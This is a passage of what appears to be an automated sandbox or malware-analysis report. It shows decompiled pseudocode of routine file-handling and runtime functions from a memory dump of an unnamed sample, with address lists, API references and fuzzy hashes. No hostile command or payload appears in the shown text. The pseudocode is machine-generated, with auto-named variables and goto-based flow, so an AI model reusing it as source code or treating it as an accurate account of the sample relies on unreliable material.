				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
				 *((char*)(_t89 + 0x6cbc)) = 0;
				 *((short*)(_t89 + 0x6cc4)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cac)) = 0;
				E00D8E920(_t87, _t89 + 0x2208, 0, 0x40);
				E00D8E920(_t87, _t89 + 0x2248, 0, 0x34);
				E00D8E920(_t87, _t89 + 0x4590, 0, 0x20);
				 *((intOrPtr*)(_t89 + 0x6cd8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cec)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf4)) = 0;
				 *((short*)(_t89 + 0x6cfa)) = 0;
				 *((char*)(_t89 + 0x6cd6)) = 0;
				 *((char*)(_t89 + 0x6cf8)) = 0;
				 *((char*)(_t89 + 0x21e0)) = 0;
				 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
				return _t89;
			}















              0x00d71382
              0x00d71382
              0x00d71382
              0x00d71382
              0x00d71382
              0x00d71387
              0x00d7138a
              0x00d7138c
              0x00d7138f
              0x00d71396
              0x00d713a2
              0x00d713a5
              0x00d713b0
              0x00d713b4
              0x00d713bf
              0x00d713c5
              0x00d713cb
              0x00d713d6
              0x00d713de
              0x00d713e2
              0x00d713e5
              0x00d713eb
              0x00d713f1
              0x00d713f3
              0x00d71418
              0x00d713f5
              0x00d713fa
              0x00d71400
              0x00d71403
              0x00d71409
              0x00d71414
              0x00d7140b
              0x00d7140d
              0x00d7140d
              0x00d71409
              0x00d7141b
              0x00d71427
              0x00d7142e
              0x00d71435
              0x00d7143e
              0x00d71449
              0x00d71453
              0x00d71459
              0x00d7145f
              0x00d71465
              0x00d7146b
              0x00d71471
              0x00d71477
              0x00d7147e
              0x00d71484
              0x00d7148a
              0x00d71490
              0x00d71496
              0x00d7149c
              0x00d714ab
              0x00d714ba
              0x00d714c5
              0x00d714cd
              0x00d714d3
              0x00d714d9
              0x00d714df
              0x00d714e5
              0x00d714eb
              0x00d714f1
              0x00d714fa
              0x00d71500
              0x00d71506
              0x00d7150e
              0x00d71518

              APIs
              • __EH_prolog.LIBCMT ref: 00D71382
                • Part of subcall function 00D75E99: __EH_prolog.LIBCMT ref: 00D75E9E
                • Part of subcall function 00D7C4CA: __EH_prolog.LIBCMT ref: 00D7C4CF
                • Part of subcall function 00D7C4CA: new.LIBCMT ref: 00D7C512
                • Part of subcall function 00D7C4CA: new.LIBCMT ref: 00D7C536
              • new.LIBCMT ref: 00D713FA
                • Part of subcall function 00D7AD1B: __EH_prolog.LIBCMT ref: 00D7AD20
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: d1be74a50be33a21e99f3498810daf984ac04fd9a6f080e9d264f3819b67c6b1
              • Instruction ID: 2e16360f1167241ab43939d94e192eefe6e62f48c7088c2a46b57f2f9e05ee54
              • Opcode Fuzzy Hash: d1be74a50be33a21e99f3498810daf984ac04fd9a6f080e9d264f3819b67c6b1
              • Instruction Fuzzy Hash: F54146B0805B409ED724DF798485AE6FBF5FF18300F508A6ED5EE83282DB326654CB21
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D7137D, Relevance: 3.1, APIs: 2, Instructions: 94COMMON
              Download Yara Rule
              C-Code - Quality: 98%
              			E00D7137D(intOrPtr* __ecx, void* __edx, void* __edi, void* __eflags) {
				void* __esi;
				signed int _t62;
				signed int _t63;
				char _t64;
				intOrPtr _t74;
				intOrPtr* _t78;
				void* _t86;
				void* _t87;
				intOrPtr* _t89;
				void* _t91;
				void* _t96;

				_t96 = __eflags;
				_t87 = __edi;
				_t86 = __edx;
				_t78 = __ecx;
				E00D8D870(E00DA1157, _t91);
				_push(_t78);
				_t89 = _t78;
				 *((intOrPtr*)(_t91 - 0x10)) = _t89;
				E00D7943C(_t78);
				 *_t89 = 0xda22e8;
				 *((intOrPtr*)(_t91 - 4)) = 0;
				E00D75E99(_t89 + 0x1024, _t86, _t96);
				 *((char*)(_t91 - 4)) = 1;
				E00D7C4CA(_t89 + 0x20e8, _t86, _t96);
				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
				E00D7151B();
				_t62 = E00D7151B();
				 *((char*)(_t91 - 4)) = 4;
				_t63 = _t62 & 0xffffff00 |  *((intOrPtr*)(_t91 + 8)) == 0x00000000;
				 *((intOrPtr*)(_t89 + 0x21bc)) = 0;
				 *(_t89 + 0x21b8) = _t63;
				_t98 = _t63;
				if(_t63 == 0) {
					_t64 =  *((intOrPtr*)(_t91 + 8));
				} else {
					_t74 = E00D8D82C(_t86, _t89, _t98, 0x82e8);
					 *((intOrPtr*)(_t91 + 8)) = _t74;
					 *((char*)(_t91 - 4)) = 5;
					if(_t74 == 0) {
						_t64 = 0;
					} else {
						_t64 = E00D7AD1B(_t74); // executed
					}
				}
				 *((intOrPtr*)(_t89 + 0x21bc)) = _t64;
				 *(_t89 + 0x21c0) =  *(_t89 + 0x21c0) | 0xffffffff;
				 *(_t89 + 0x21c4) =  *(_t89 + 0x21c4) | 0xffffffff;
				 *(_t89 + 0x21c8) =  *(_t89 + 0x21c8) | 0xffffffff;
				 *((char*)(_t89 + 0x1d)) =  *((intOrPtr*)(_t64 + 0x6199));
				 *((intOrPtr*)(_t89 + 0x6cb0)) = 2;
				 *((intOrPtr*)(_t89 + 0x6cb4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cb8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cc0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
				 *((char*)(_t89 + 0x6cbc)) = 0;
				 *((short*)(_t89 + 0x6cc4)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cac)) = 0;
				E00D8E920(_t87, _t89 + 0x2208, 0, 0x40);
				E00D8E920(_t87, _t89 + 0x2248, 0, 0x34);
				E00D8E920(_t87, _t89 + 0x4590, 0, 0x20);
				 *((intOrPtr*)(_t89 + 0x6cd8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cec)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf4)) = 0;
				 *((short*)(_t89 + 0x6cfa)) = 0;
				 *((char*)(_t89 + 0x6cd6)) = 0;
				 *((char*)(_t89 + 0x6cf8)) = 0;
				 *((char*)(_t89 + 0x21e0)) = 0;
				 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
				return _t89;
			}














              0x00d7137d
              0x00d7137d
              0x00d7137d
              0x00d7137d
              0x00d71382
              0x00d71387
              0x00d7138a
              0x00d7138c
              0x00d7138f
              0x00d71396
              0x00d713a2
              0x00d713a5
              0x00d713b0
              0x00d713b4
              0x00d713bf
              0x00d713c5
              0x00d713cb
              0x00d713d6
              0x00d713de
              0x00d713e2
              0x00d713e5
              0x00d713eb
              0x00d713f1
              0x00d713f3
              0x00d71418
              0x00d713f5
              0x00d713fa
              0x00d71400
              0x00d71403
              0x00d71409
              0x00d71414
              0x00d7140b
              0x00d7140d
              0x00d7140d
              0x00d71409
              0x00d7141b
              0x00d71427
              0x00d7142e
              0x00d71435
              0x00d7143e
              0x00d71449
              0x00d71453
              0x00d71459
              0x00d7145f
              0x00d71465
              0x00d7146b
              0x00d71471
              0x00d71477
              0x00d7147e
              0x00d71484
              0x00d7148a
              0x00d71490
              0x00d71496
              0x00d7149c
              0x00d714ab
              0x00d714ba
              0x00d714c5
              0x00d714cd
              0x00d714d3
              0x00d714d9
              0x00d714df
              0x00d714e5
              0x00d714eb
              0x00d714f1
              0x00d714fa
              0x00d71500
              0x00d71506
              0x00d7150e
              0x00d71518

              APIs
              • __EH_prolog.LIBCMT ref: 00D71382
                • Part of subcall function 00D75E99: __EH_prolog.LIBCMT ref: 00D75E9E
                • Part of subcall function 00D7C4CA: __EH_prolog.LIBCMT ref: 00D7C4CF
                • Part of subcall function 00D7C4CA: new.LIBCMT ref: 00D7C512
                • Part of subcall function 00D7C4CA: new.LIBCMT ref: 00D7C536
              • new.LIBCMT ref: 00D713FA
                • Part of subcall function 00D7AD1B: __EH_prolog.LIBCMT ref: 00D7AD20
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: 1b98848f2073f309241ee8860162ecb0983f9a554f040ec6350dd2fa0c6ffde9
              • Instruction ID: da0a2957366a9fe3ab5c3e7c6071b784c4f4cb47b517ebc8c3f3d6ca5c57727a
              • Opcode Fuzzy Hash: 1b98848f2073f309241ee8860162ecb0983f9a554f040ec6350dd2fa0c6ffde9
              • Instruction Fuzzy Hash: DC4155B0805B409EE724DF798485AE6FBF5FF19300F408A6ED5EE83282DB326554CB21
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D9A6B2, Relevance: 3.1, APIs: 2, Instructions: 91COMMON
              Download Yara Rule
              C-Code - Quality: 95%
              			E00D9A6B2(signed int __ebx, void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, char _a8) {
				char _v8;
				char _v16;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t31;
				signed int _t36;
				char _t40;
				intOrPtr _t44;
				char _t45;
				signed int _t51;
				void* _t64;
				void* _t70;
				signed int _t75;
				void* _t81;

				_t81 = __eflags;
				_v8 = E00D98516(__ebx, __ecx, __edx);
				E00D9A7D1(__ebx, __ecx, __edx, _t81);
				_t31 = E00D9A446(_t81, _a4);
				_v16 = _t31;
				_t57 =  *(_v8 + 0x48);
				if(_t31 ==  *((intOrPtr*)( *(_v8 + 0x48) + 4))) {
					return 0;
				}
				_push(__ebx);
				_t70 = E00D97A8A(_t57, 0x220);
				_t51 = __ebx | 0xffffffff;
				__eflags = _t70;
				if(__eflags == 0) {
					L5:
					_t75 = _t51;
					goto L6;
				} else {
					_t70 = memcpy(_t70,  *(_v8 + 0x48), 0x88 << 2);
					 *_t70 =  *_t70 & 0x00000000; // executed
					_t36 = E00D9A873(_t51, _t70,  *(_v8 + 0x48), __eflags, _v16, _t70); // executed
					_t75 = _t36;
					__eflags = _t75 - _t51;
					if(_t75 != _t51) {
						__eflags = _a8;
						if(_a8 == 0) {
							E00D97847();
						}
						asm("lock xadd [eax], ebx");
						__eflags = _t51 == 1;
						if(_t51 == 1) {
							_t45 = _v8;
							__eflags =  *((intOrPtr*)(_t45 + 0x48)) - 0xdadb20;
							if( *((intOrPtr*)(_t45 + 0x48)) != 0xdadb20) {
								E00D97A50( *((intOrPtr*)(_t45 + 0x48)));
							}
						}
						 *_t70 = 1;
						_t64 = _t70;
						_t70 = 0;
						 *(_v8 + 0x48) = _t64;
						_t40 = _v8;
						__eflags =  *(_t40 + 0x350) & 0x00000002;
						if(( *(_t40 + 0x350) & 0x00000002) == 0) {
							__eflags =  *0xdadda0 & 0x00000001;
							if(( *0xdadda0 & 0x00000001) == 0) {
								_v16 =  &_v8;
								E00D9A31C(5,  &_v16);
								__eflags = _a8;
								if(_a8 != 0) {
									_t44 =  *0xdadd40; // 0x10a2570
									 *0xdad814 = _t44;
								}
							}
						}
						L6:
						E00D97A50(_t70);
						return _t75;
					} else {
						 *((intOrPtr*)(E00D97ECC())) = 0x16;
						goto L5;
					}
				}
			}


















              0x00d9a6b2
              0x00d9a6bf
              0x00d9a6c2
              0x00d9a6ca
              0x00d9a6d3
              0x00d9a6d6
              0x00d9a6dc
              0x00000000
              0x00d9a6de
              0x00d9a6e2
              0x00d9a6ef
              0x00d9a6f1
              0x00d9a6f5
              0x00d9a6f7
              0x00d9a727
              0x00d9a727
              0x00000000
              0x00d9a6f9
              0x00d9a706
              0x00d9a70c
              0x00d9a70f
              0x00d9a714
              0x00d9a718
              0x00d9a71a
              0x00d9a739
              0x00d9a73d
              0x00d9a73f
              0x00d9a73f
              0x00d9a74a
              0x00d9a74e
              0x00d9a74f
              0x00d9a751
              0x00d9a754
              0x00d9a75b
              0x00d9a760
              0x00d9a765
              0x00d9a75b
              0x00d9a766
              0x00d9a76c
              0x00d9a771
              0x00d9a773
              0x00d9a776
              0x00d9a779
              0x00d9a780
              0x00d9a782
              0x00d9a789
              0x00d9a78e
              0x00d9a797
              0x00d9a79c
              0x00d9a7a2
              0x00d9a7a4
              0x00d9a7a9
              0x00d9a7a9
              0x00d9a7a2
              0x00d9a789
              0x00d9a729
              0x00d9a72a
              0x00000000
              0x00d9a71c
              0x00d9a721
              0x00000000
              0x00d9a721
              0x00d9a71a

              APIs
                • Part of subcall function 00D98516: GetLastError.KERNEL32(?,00DB00E0,00D93394,00DB00E0,?,?,00D92E0F,?,?,00DB00E0), ref: 00D9851A
                • Part of subcall function 00D98516: _free.LIBCMT ref: 00D9854D
                • Part of subcall function 00D98516: SetLastError.KERNEL32(00000000,?,00DB00E0), ref: 00D9858E
                • Part of subcall function 00D98516: _abort.LIBCMT ref: 00D98594
                • Part of subcall function 00D9A7D1: _abort.LIBCMT ref: 00D9A803
                • Part of subcall function 00D9A7D1: _free.LIBCMT ref: 00D9A837
                • Part of subcall function 00D9A446: GetOEMCP.KERNEL32(00000000,?,?,00D9A6CF,?), ref: 00D9A471
              • _free.LIBCMT ref: 00D9A72A
              • _free.LIBCMT ref: 00D9A760
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: _free$ErrorLast_abort
              • String ID:
              • API String ID: 2991157371-0
              • Opcode ID: 41463ac2b408e6c0098914b731d347c3654975040b03c6992e48de419251616b
              • Instruction ID: 863c312ad493d0e4cb2f83ddb2df2fa6065145a12ae4b3a360fb7cb31ad19bc7
              • Opcode Fuzzy Hash: 41463ac2b408e6c0098914b731d347c3654975040b03c6992e48de419251616b
              • Instruction Fuzzy Hash: 91318732904205AFDF10EFACD546BAD77F5DF41360F294099E8049B291EB719E41DBB1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D79528, Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00D79528(void* __ecx, short _a4, WCHAR* _a4104, signed char _a4108) {
				long _v0;
				signed char _t34;
				signed int _t36;
				void* _t37;
				signed char _t46;
				struct _SECURITY_ATTRIBUTES* _t47;
				long _t56;
				void* _t59;
				long _t63;

				E00D8D940();
				_t46 = _a4108;
				_t34 = _t46 >> 0x00000001 & 0x00000001;
				_t59 = __ecx;
				if((_t46 & 0x00000010) != 0 ||  *((char*)(__ecx + 0x1d)) != 0) {
					_t63 = 1;
					__eflags = 1;
				} else {
					_t63 = 0;
				}
				 *(_t59 + 0x18) = _t46;
				_v0 = ((0 | _t34 == 0x00000000) - 0x00000001 & 0x80000000) + 0xc0000000;
				_t36 =  *(E00D7B927(_t34, _a4104)) & 0x0000ffff;
				if(_t36 == 0x2e || _t36 == 0x20) {
					if((_t46 & 0x00000020) != 0) {
						goto L8;
					} else {
						 *(_t59 + 4) =  *(_t59 + 4) | 0xffffffff;
						_t47 = 0;
						_t56 = _v0;
					}
				} else {
					L8:
					_t56 = _v0;
					_t47 = 0;
					__eflags = 0;
					_t37 = CreateFileW(_a4104, _t56, _t63, 0, 2, 0, 0); // executed
					 *(_t59 + 4) = _t37;
				}
				if( *(_t59 + 4) == 0xffffffff && E00D7B32C(_a4104,  &_a4, 0x800) != 0) {
					 *(_t59 + 4) = CreateFileW( &_a4, _t56, _t63, _t47, 2, _t47, _t47);
				}
				 *((char*)(_t59 + 0x12)) = 1;
				 *(_t59 + 0xc) = _t47;
				 *(_t59 + 0x10) = _t47;
				return E00D7FAB1(_t59 + 0x1e, _a4104, 0x800) & 0xffffff00 |  *(_t59 + 4) != 0xffffffff;
			}












              0x00d7952d
              0x00d79533
              0x00d79540
              0x00d79542
              0x00d79548
              0x00d79556
              0x00d79556
              0x00d79550
              0x00d79550
              0x00d79550
              0x00d79560
              0x00d79575
              0x00d7957e
              0x00d79584
              0x00d7958e
              0x00000000
              0x00d79590
              0x00d79590
              0x00d79594
              0x00d79596
              0x00d79596
              0x00d7959c
              0x00d7959c
              0x00d7959c
              0x00d795a0
              0x00d795a0
              0x00d795b0
              0x00d795b6
              0x00d795b6
              0x00d795bd
              0x00d795eb
              0x00d795eb
              0x00d795fd
              0x00d79602
              0x00d79605
              0x00d7961e

              APIs
              • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00D79BF3,?,?,00D776AC), ref: 00D795B0
              • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00D79BF3,?,?,00D776AC), ref: 00D795E5
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: CreateFile
              • String ID:
              • API String ID: 823142352-0
              • Opcode ID: c932e45235df02ef0b5a55d41568658e3047a18ac326e959ba95066ed3c831a5
              • Instruction ID: 9a12376a279c7b4345c1efe65b18f40d5a7da894dba1807ad101c8728144cfe5
              • Opcode Fuzzy Hash: c932e45235df02ef0b5a55d41568658e3047a18ac326e959ba95066ed3c831a5
              • Instruction Fuzzy Hash: EC21E1B2004748AFE7318F24C845BA7B7E8EB49364F04892DF5E9822D1D374ED488B71
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D79A7E, Relevance: 3.1, APIs: 2, Instructions: 82timeCOMMON
              Download Yara Rule
              C-Code - Quality: 84%
              			E00D79A7E(void* __ecx, void* __esi, signed char _a4, signed int* _a8, signed int* _a12) {
				void* _v8;
				void* _v16;
				void* _v24;
				signed char _v25;
				int _t34;
				signed char _t49;
				signed int* _t51;
				signed char _t57;
				void* _t58;
				void* _t59;
				signed int* _t60;
				signed int* _t62;

				_t59 = __esi;
				_t58 = __ecx;
				if( *(__ecx + 0x18) != 0x100 && ( *(__ecx + 0x18) & 0x00000002) == 0) {
					FlushFileBuffers( *(__ecx + 4));
				}
				_t51 = _a4;
				_t49 = 1;
				if(_t51 == 0 || ( *_t51 | _t51[1]) == 0) {
					_t57 = 0;
				} else {
					_t57 = 1;
				}
				_push(_t59);
				_t60 = _a8;
				_v25 = _t57;
				if(_t60 == 0) {
					L9:
					_a4 = 0;
				} else {
					_a4 = _t49;
					if(( *_t60 | _t60[1]) == 0) {
						goto L9;
					}
				}
				_t62 = _a12;
				if(_t62 == 0 || ( *_t62 | _a4) == 0) {
					_t49 = 0;
				}
				if(_t57 != 0) {
					E00D8082F(_t51, _t57,  &_v24);
				}
				if(_a4 != 0) {
					E00D8082F(_t60, _t57,  &_v8);
				}
				if(_t49 != 0) {
					E00D8082F(_t62, _t57,  &_v16);
				}
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				_t34 = SetFileTime( *(_t58 + 4),  ~(_a4 & 0x000000ff) &  &_v8,  ~(_t49 & 0x000000ff) &  &_v16,  ~(_v25 & 0x000000ff) &  &_v24); // executed
				return _t34;
			}















              0x00d79a7e
              0x00d79a84
              0x00d79a8d
              0x00d79a98
              0x00d79a98
              0x00d79a9e
              0x00d79aa4
              0x00d79aa7
              0x00d79ab4
              0x00d79ab0
              0x00d79ab0
              0x00d79ab0
              0x00d79ab6
              0x00d79ab7
              0x00d79abb
              0x00d79ac1
              0x00d79ace
              0x00d79ace
              0x00d79ac3
              0x00d79ac8
              0x00d79acc
              0x00000000
              0x00000000
              0x00d79acc
              0x00d79ad3
              0x00d79ad9
              0x00d79ae3
              0x00d79ae3
              0x00d79ae7
              0x00d79aee
              0x00d79aee
              0x00d79af8
              0x00d79b01
              0x00d79b01
              0x00d79b09
              0x00d79b12
              0x00d79b12
              0x00d79b22
              0x00d79b30
              0x00d79b40
              0x00d79b48
              0x00d79b54

              APIs
              • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,?,00D7738C,?,?,?), ref: 00D79A98
              • SetFileTime.KERNELBASE(?,?,?,?), ref: 00D79B48
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: File$BuffersFlushTime
              • String ID:
              • API String ID: 1392018926-0
              • Opcode ID: 06f543f62d74697871a3b30aa499cb97a8fafdbb24029dc810629c619598b20b
              • Instruction ID: d8e3307fe3df2ae06af845287838a71983150352d4eeebeba9bd6fe2e3434554
              • Opcode Fuzzy Hash: 06f543f62d74697871a3b30aa499cb97a8fafdbb24029dc810629c619598b20b
              • Instruction Fuzzy Hash: F921A332659385AFC711DE24C8A1AABFBE8AF55704F08491DB8C9C7241E725ED4CC7B1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D99990, Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMON
              Download Yara Rule
              C-Code - Quality: 90%
              			E00D99990(signed int _a4, CHAR* _a8, intOrPtr* _a12, intOrPtr _a16) {
				struct HINSTANCE__* _t13;
				signed int* _t20;
				signed int _t27;
				signed int _t28;
				signed int _t29;
				signed int _t33;
				intOrPtr* _t34;

				_t20 = 0xdd07b8 + _a4 * 4;
				_t27 =  *0xdad668; // 0x9e43e7e4
				_t29 = _t28 | 0xffffffff;
				_t33 = _t27 ^  *_t20;
				asm("ror esi, cl");
				if(_t33 == _t29) {
					L14:
					return 0;
				}
				if(_t33 == 0) {
					_t34 = _a12;
					if(_t34 == _a16) {
						L7:
						_t13 = 0;
						L8:
						if(_t13 == 0) {
							L13:
							_push(0x20);
							asm("ror edi, cl");
							 *_t20 = _t29 ^ _t27;
							goto L14;
						}
						_t33 = GetProcAddress(_t13, _a8);
						if(_t33 == 0) {
							_t27 =  *0xdad668; // 0x9e43e7e4
							goto L13;
						}
						 *_t20 = E00D8DB10(_t33);
						goto L2;
					} else {
						goto L4;
					}
					while(1) {
						L4:
						_t13 = E00D99A2C( *_t34); // executed
						if(_t13 != 0) {
							break;
						}
						_t34 = _t34 + 4;
						if(_t34 != _a16) {
							continue;
						}
						_t27 =  *0xdad668; // 0x9e43e7e4
						goto L7;
					}
					_t27 =  *0xdad668; // 0x9e43e7e4
					goto L8;
				}
				L2:
				return _t33;
			}










              0x00d9999b
              0x00d999a4
              0x00d999aa
              0x00d999b4
              0x00d999b6
              0x00d999ba
              0x00d99a25
              0x00000000
              0x00d99a25
              0x00d999be
              0x00d999c4
              0x00d999ca
              0x00d999e6
              0x00d999e6
              0x00d999e8
              0x00d999ea
              0x00d99a15
              0x00d99a17
              0x00d99a1f
              0x00d99a23
              0x00000000
              0x00d99a23
              0x00d999f6
              0x00d999fa
              0x00d99a0f
              0x00000000
              0x00d99a0f
              0x00d99a03
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00d999cc
              0x00d999cc
              0x00d999ce
              0x00d999d6
              0x00000000
              0x00000000
              0x00d999d8
              0x00d999de
              0x00000000
              0x00000000
              0x00d999e0
              0x00000000
              0x00d999e0
              0x00d99a07
              0x00000000
              0x00d99a07
              0x00d999c0
              0x00000000

              APIs
              • GetProcAddress.KERNEL32(00000000,?), ref: 00D999F0
              • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00D999FD
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: AddressProc__crt_fast_encode_pointer
              • String ID:
              • API String ID: 2279764990-0
              • Opcode ID: f48c377321a1f87a98140624c388fe3528bd7744d9fb66f91498aa256f11a14b
              • Instruction ID: 6705785e743b1d82790e37d9622816306d8ab3a510e8b636b144a2256cd84259
              • Opcode Fuzzy Hash: f48c377321a1f87a98140624c388fe3528bd7744d9fb66f91498aa256f11a14b
              • Instruction Fuzzy Hash: 1C11A733A012255B9F25DF2DDC6099AB396EB8536071E4128EC59EB294D731EC41CAF0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D79B57, Relevance: 3.1, APIs: 2, Instructions: 54COMMON
              Download Yara Rule
              C-Code - Quality: 89%
              			E00D79B57() {
				long _v4;
				void* __ecx;
				void* __ebp;
				long _t12;
				signed int _t14;
				signed int _t21;
				signed int _t22;
				void* _t23;
				long _t32;
				void* _t34;

				_t34 = _t23;
				_t22 = _t21 | 0xffffffff;
				if( *(_t34 + 4) != _t22) {
					L3:
					_v4 = _v4 & 0x00000000;
					_t12 = SetFilePointer( *(_t34 + 4), 0,  &_v4, 1); // executed
					_t32 = _t12;
					if(_t32 != _t22 || GetLastError() == 0) {
						L7:
						asm("cdq");
						_t14 = 0 + _t32;
						asm("adc edx, 0x0");
						goto L8;
					} else {
						if( *((char*)(_t34 + 0x14)) == 0) {
							_t14 = _t22;
							L8:
							return _t14;
						}
						E00D76DE2(0xdb00e0, 0xdb00e0, _t34 + 0x1e);
						goto L7;
					}
				}
				if( *((char*)(_t34 + 0x14)) == 0) {
					return _t22;
				}
				E00D76DE2(0xdb00e0, 0xdb00e0, _t34 + 0x1e);
				goto L3;
			}













              0x00d79b5b
              0x00d79b5d
              0x00d79b68
              0x00d79b7b
              0x00d79b7b
              0x00d79b8d
              0x00d79b93
              0x00d79b97
              0x00d79bb4
              0x00d79bba
              0x00d79bbf
              0x00d79bc1
              0x00000000
              0x00d79ba3
              0x00d79ba7
              0x00d79bd0
              0x00d79bc4
              0x00000000
              0x00d79bc4
              0x00d79baf
